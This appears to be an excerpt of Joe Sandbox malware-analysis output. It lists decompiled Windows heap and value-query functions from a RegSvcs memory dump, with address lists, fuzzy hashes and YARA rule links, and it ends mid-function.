Instruction ID: ec364cd6b1e6e5e6e366dae63bb62f0c8b1a39767af47fd7d9e97186f1f1fd9d
Opcode Fuzzy Hash: acde7c066c1e1a23995d32654b2739021589cf10968fa1b65c3ef96ae32faa5e
Instruction Fuzzy Hash: 2F817075E002299FDB50CF99C881BEEBBF5AF58350F1480A9EA84EB251D335AC05DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00FBC600 Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00FBC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x10ad360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E00FC6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E00FFB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x10a7b9c; // 0x0
					_t74 = L00FD4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E00FF9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L00FD77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E00FFF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E00FF13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L00FD77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E00FF9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x00fbc608
0x00fbc615
0x00fbc625
0x00fbc62d
0x00fbc635
0x00fbc640
0x00fbc680
0x00fbc687
0x00fbc688
0x00fbc689
0x00fbc694
0x00fbc694
0x00fbc642
0x00fbc64a
0x00fbc697
0x01027a25
0x01027a2b
0x01027a2e
0x01027a30
0x01027bea
0x01027bea
0x00000000
0x01027bea
0x01027a36
0x01027a43
0x01027a48
0x01027a4c
0x01027a4e
0x00000000
0x00000000
0x01027a58
0x01027a5a
0x01027a5b
0x01027a5c
0x01027a5d
0x01027a63
0x01027a64
0x01027a6a
0x01027a6c
0x01027a6e
0x010279cb
0x010279cb
0x010279ce
0x010279d0
0x01027a98
0x01027a9b
0x01027a9b
0x01027a9e
0x01027aa1
0x01027bbe
0x01027bbe
0x01027bc0
0x01027be0
0x01027be0
0x01027a01
0x01027a01
0x01027a05
0x01027a07
0x01027a15
0x01027a15
0x01027a1a
0x00000000
0x01027a1a
0x01027bc2
0x01027bc6
0x01027bc9
0x01027bcd
0x01027bcf
0x010279e6
0x010279e6
0x010279eb
0x010279eb
0x010279ef
0x010279f1
0x00000000
0x00000000
0x010279f3
0x010279f5
0x010279ff
0x010279ff
0x00000000
0x010279ff
0x010279f7
0x010279fd
0x00000000
0x00000000
0x00000000
0x010279fd
0x01027bd5
0x01027bd8
0x00000000
0x00000000
0x01027ba9
0x01027bac
0x01027bb0
0x01027bb1
0x01027bb1
0x01027bb6
0x00000000
0x01027bb6
0x01027aa7
0x01027aaa
0x00000000
0x00000000
0x01027ab2
0x01027ab3
0x01027ab5
0x01027aec
0x01027aef
0x01027b25
0x01027b28
0x01027b62
0x01027b64
0x01027b8f
0x01027b92
0x01027b96
0x01027b98
0x00000000
0x00000000
0x01027b9e
0x01027b9f
0x01027ba3
0x00000000
0x01027ba3
0x01027b66
0x01027b68
0x01027ae2
0x01027ae2
0x00000000
0x01027ae2
0x01027b6e
0x01027b72
0x01027b75
0x01027b81
0x01027b85
0x01027b87
0x00000000
0x00000000
0x01027b31
0x01027b34
0x01027b3c
0x01027b45
0x01027b46
0x01027b4f
0x01027b51
0x01027b57
0x01027b59
0x01027b59
0x00000000
0x01027b59
0x01027b77
0x00000000
0x01027b77
0x01027b2a
0x00000000
0x01027b2a
0x01027af1
0x01027af3
0x00000000
0x00000000
0x01027afb
0x01027afc
0x01027afe
0x00000000
0x00000000
0x01027b00
0x01027b03
0x00000000
0x00000000
0x01027b05
0x01027b09
0x01027b0d
0x01027b0f
0x00000000
0x00000000
0x01027b18
0x01027b1d
0x00000000
0x01027b1d
0x01027ab7
0x01027ab9
0x00000000
0x00000000
0x01027abf
0x01027ac1
0x00000000
0x00000000
0x01027ac3
0x01027ac6
0x00000000
0x00000000
0x01027ac8
0x01027acc
0x01027ad0
0x01027ad2
0x00000000
0x00000000
0x01027adb
0x00000000
0x01027adb
0x010279d6
0x010279d9
0x010279dc
0x01027a91
0x01027a94
0x00000000
0x01027a94
0x010279e2
0x00000000
0x010279e2
0x01027a74
0x01027a7a
0x00000000
0x00000000
0x01027a8a
0x01027a21
0x01027a21
0x00000000
0x01027a21
0x00fbc650
0x00fbc651
0x00fbc656
0x00fbc65c
0x00fbc65d
0x00fbc663
0x00fbc664
0x00fbc66a
0x00fbc66e
0x010279c5
0x010279c7
0x00000000
0x010279c7
0x00fbc67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e95b201ff58f42fcb329c178c655c517cee232a2cf817a988caaecee602c2335
Instruction ID: 22e23b30dbc1dee3a6fd4da270a3eff981e679241c0541c6c0c69d20455034a9
Opcode Fuzzy Hash: e95b201ff58f42fcb329c178c655c517cee232a2cf817a988caaecee602c2335
Instruction Fuzzy Hash: 428180756043219BDB66CE58C881B7FB7E5EF94360F1448AAFE859B242D330DD40CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00FE138B Relevance: .2, Instructions: 206
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00FE138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t97;
				signed int _t102;
				void* _t105;
				char* _t112;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				signed int* _t122;
				signed int _t124;
				signed int _t130;
				signed int _t136;
				char _t150;
				intOrPtr _t153;
				signed int _t161;
				signed int _t163;
				signed int _t170;
				signed int _t175;
				signed int _t176;
				signed int _t182;
				signed int* _t183;
				signed int* _t184;

				_t182 = __ecx;
				_t153 = _a24;
				_t183 = __edx;
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
				_t97 = _t153 - _a16;
				if(_t97 > 0xfffff000) {
					L19:
					return 0;
				}
				asm("cdq");
				_t150 = _a20;
				_v16 = _t97 / 0x1000;
				_t102 = _a4 + 0x00000007 & 0xfffffff8;
				_t170 = _t102 + __edx;
				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
				_t105 = _t170 + 0x28;
				_v12 = _t170;
				if(_t105 >= _t150) {
					if(_t105 >= _t153) {
						goto L19;
					}
					_v8 = _t170 - _t150 + 8;
					_push(E00FE0678(__ecx, 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push( &_a20);
					_push(0xffffffff);
					if(E00FF9660() < 0) {
						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
						goto L19;
					}
					if(E00FD7D50() == 0) {
						_t112 = 0x7ffe0380;
					} else {
						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0107138A(_t150, _t182, _a20, _v8, 3);
					}
					_t150 = _a20 + _v8;
					_t153 = _a24;
					_a20 = _t150;
				}
				_t183[0] = 1;
				_t113 = _t153 - _t150;
				_t183[1] = 1;
				asm("cdq");
				_t175 = _t113 % 0x1000;
				_v28 = _t113 / 0x1000;
				 *_t183 = _v20;
				_t183[1] =  *(_t182 + 0x54);
				if((_v24 & 0x00001000) != 0) {
					_t117 = E00FE16C7(1, _t175);
					_t150 = _a20;
					_t183[0xd] = _t117;
				}
				_t183[0xb] = _t183[0xb] & 0x00000000;
				_t176 = _v12;
				_t183[3] = _a12;
				_t119 = _a16;
				_t183[7] = _t119;
				_t161 = _v16 << 0xc;
				_t183[6] = _t182;
				_t183[0xa] = _t119 + _t161;
				_t183[8] = _v16;
				_t122 =  &(_t183[0xe]);
				_t183[2] = 0xffeeffee;
				_t183[9] = _t176;
				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
				_t122[1] = _t122;
				 *_t122 = _t122;
				if(_t183[6] != _t183) {
					_t124 = 1;
				} else {
					_t124 = 0;
				}
				_t183[1] = _t124;
				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
				if(_t183[6] != _t183) {
					_t130 = (_t176 - _t183 >> 0x10) + 1;
					_v24 = _t130;
					if(_t130 >= 0xfe) {
						_push(_t161);
						_push(0);
						E0107A80D(_t183[6], 3, _t176, _t183);
						_t150 = _a20;
						_t176 = _v12;
						_t130 = _v24;
					}
				} else {
					_t130 = 0;
				}
				 *(_t176 + 6) = _t130;
				E00FDB73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
				}
				if(_v8 != 0) {
					E00FDA830(_t182, _v12, _v8);
				}
				_t136 = _t182 + 0xa4;
				_t184 =  &(_t183[4]);
				_t163 =  *(_t136 + 4);
				if( *_t163 != _t136) {
					_push(_t163);
					_push( *_t163);
					E0107A80D(0, 0xd, _t136, 0);
				} else {
					 *_t184 = _t136;
					_t184[1] = _t163;
					 *_t163 = _t184;
					 *(_t136 + 4) = _t184;
				}
				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
				return 1;
			}

0x00fe139f
0x00fe13a1
0x00fe13a4
0x00fe13a6
0x00fe13ab
0x00fe13b3
0x01025522
0x00000000
0x01025522
0x00fe13b9
0x00fe13c1
0x00fe13c4
0x00fe13cd
0x00fe13d0
0x00fe13d9
0x00fe13dc
0x00fe13df
0x00fe13e4
0x0102552b
0x00000000
0x00000000
0x01025534
0x0102553f
0x01025545
0x01025549
0x0102554a
0x0102554f
0x01025550
0x01025559
0x0102551c
0x00000000
0x0102551c
0x01025562
0x01025574
0x01025564
0x0102556d
0x0102556d
0x0102557c
0x01025597
0x01025597
0x0102559f
0x010255a2
0x010255a5
0x010255a5
0x00fe13ec
0x00fe13f2
0x00fe13f4
0x00fe13f8
0x00fe13fe
0x00fe1400
0x00fe1406
0x00fe1412
0x00fe1419
0x010255b0
0x010255b5
0x010255b8
0x010255b8
0x00fe1425
0x00fe1429
0x00fe142c
0x00fe142f
0x00fe1432
0x00fe1435
0x00fe143a
0x00fe143d
0x00fe1443
0x00fe1446
0x00fe1449
0x00fe1450
0x00fe1453
0x00fe1459
0x00fe145f
0x00fe1462
0x00fe1467
0x00fe14fa
0x00fe146d
0x00fe146d
0x00fe146d
0x00fe146f
0x00fe1479
0x00fe1480
0x00fe1507
0x00fe1508
0x00fe1510
0x010255c1
0x010255c2
0x010255cc
0x010255d1
0x010255d4
0x010255d7
0x010255d7
0x00fe1482
0x00fe1482
0x00fe1482
0x00fe1484
0x00fe149b
0x00fe14a4
0x00fe14ae
0x00fe14b4
0x00fe14b4
0x00fe14ba
0x00fe14c4
0x00fe14c4
0x00fe14c9
0x00fe14cf
0x00fe14d2
0x00fe14d7
0x010255df
0x010255e0
0x010255ea
0x00fe14dd
0x00fe14dd
0x00fe14df
0x00fe14e2
0x00fe14e4
0x00fe14e4
0x00fe14e7
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
Instruction ID: ee4c365368164db40f61f298cafb5536e051f7a108b556d93160c25c2dfb1d6b
Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
Instruction Fuzzy Hash: 8D818771A006459FCB24CF69C840BEABBF5FF49300F14856AE996C7391D334EA41DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0104B8D0 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0104B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x10a7b9c; // 0x0
				_t124 = L00FD4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E00FF9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E00FF95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E00FF95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L00FD77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E00FF9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E00FF95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x10a7b9c; // 0x0
									_t92 = L00FD4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E00FF9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E00FBA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0104E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0104E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E00FF95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0104b8d9
0x0104b8e4
0x00000000
0x0104b8e6
0x0104b8f3
0x0104b8f5
0x0104b8f5
0x0104b8f8
0x0104b920
0x0104b924
0x0104b936
0x0104b939
0x0104b93d
0x0104b948
0x0104b9a0
0x0104b9a0
0x0104b9a4
0x0104b9bf
0x0104b9c4
0x0104b9c6
0x0104b9cd
0x0104b9d1
0x0104bad4
0x0104bad8
0x0104bada
0x0104badc
0x0104badc
0x0104badf
0x0104bae0
0x0104bae2
0x0104bae4
0x0104baec
0x0104baee
0x0104baf0
0x0104baf0
0x0104baec
0x0104bafb
0x0104bafc
0x0104bafe
0x0104bb01
0x0104bb01
0x00000000
0x0104bb06
0x0104b9d7
0x0104b9db
0x0104b9db
0x0104b9de
0x0104b9de
0x0104b9e4
0x0104b9e7
0x0104b9ea
0x0104b9ec
0x0104b9ef
0x0104b9f3
0x0104ba1b
0x0104ba1b
0x0104ba23
0x0104ba24
0x0104ba27
0x0104ba2a
0x0104ba2b
0x0104ba2e
0x0104ba30
0x0104ba37
0x0104ba3f
0x0104ba9c
0x0104baa2
0x0104bb13
0x0104bb15
0x0104baae
0x0104baae
0x0104bab3
0x0104bab5
0x0104baba
0x0104bac8
0x0104bac8
0x0104baba
0x0104bacd
0x0104bacf
0x00000000
0x0104bacf
0x0104bb1a
0x00000000
0x0104bb1c
0x0104baa7
0x0104bb11
0x00000000
0x0104bb11
0x0104baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0104ba41
0x0104ba41
0x0104ba41
0x0104ba58
0x0104ba5d
0x0104ba62
0x00000000
0x00000000
0x0104ba64
0x0104ba67
0x0104ba68
0x0104ba69
0x0104ba6c
0x0104ba6f
0x0104ba71
0x0104ba78
0x0104ba80
0x00000000
0x00000000
0x0104ba90
0x0104ba90
0x0104ba97
0x00000000
0x0104ba97
0x0104b9f5
0x0104b9f7
0x0104b9f7
0x0104b9fa
0x0104ba03
0x0104ba07
0x0104ba0c
0x0104ba10
0x0104ba17
0x00000000
0x0104b9f7
0x0104b9a6
0x0104b9a8
0x0104b9af
0x0104b9b3
0x00000000
0x00000000
0x0104b9b9
0x00000000
0x0104b9b9
0x0104b94d
0x0104b98f
0x0104b995
0x0104b999
0x0104b960
0x0104b967
0x0104b968
0x0104b96a
0x00000000
0x0104b96a
0x0104b99b
0x0104b99e
0x00000000
0x00000000
0x00000000
0x0104b99e
0x0104b951
0x0104b954
0x0104b95a
0x0104b95e
0x0104b972
0x0104b979
0x0104b97d
0x0104b97f
0x0104b980
0x0104b982
0x0104b984
0x00000000
0x0104b984
0x00000000
0x0104b926
0x00000000
0x0104b926

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc8ae440fae7e643a08ff54407d2c887fbe1080182937864ff9700e2cc8e4f38
Instruction ID: e4be6f6a9bf8aeafcda544794788b7055c22636a52b0b5f43cd761e7f3a10bc4
Opcode Fuzzy Hash: cc8ae440fae7e643a08ff54407d2c887fbe1080182937864ff9700e2cc8e4f38
Instruction Fuzzy Hash: 107124B2200705AFE732DF18CC81F66BBE5EF44720F144938E6958B2A1DBB5E940DB40

Uniqueness

Uniqueness Score: -1.00%

Function 01036DC9 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E01036DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L00FD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01036B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E00FD7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E00FF9AE0();
					_t87 = L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0103795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0103795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0103795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0103795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L00FD4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
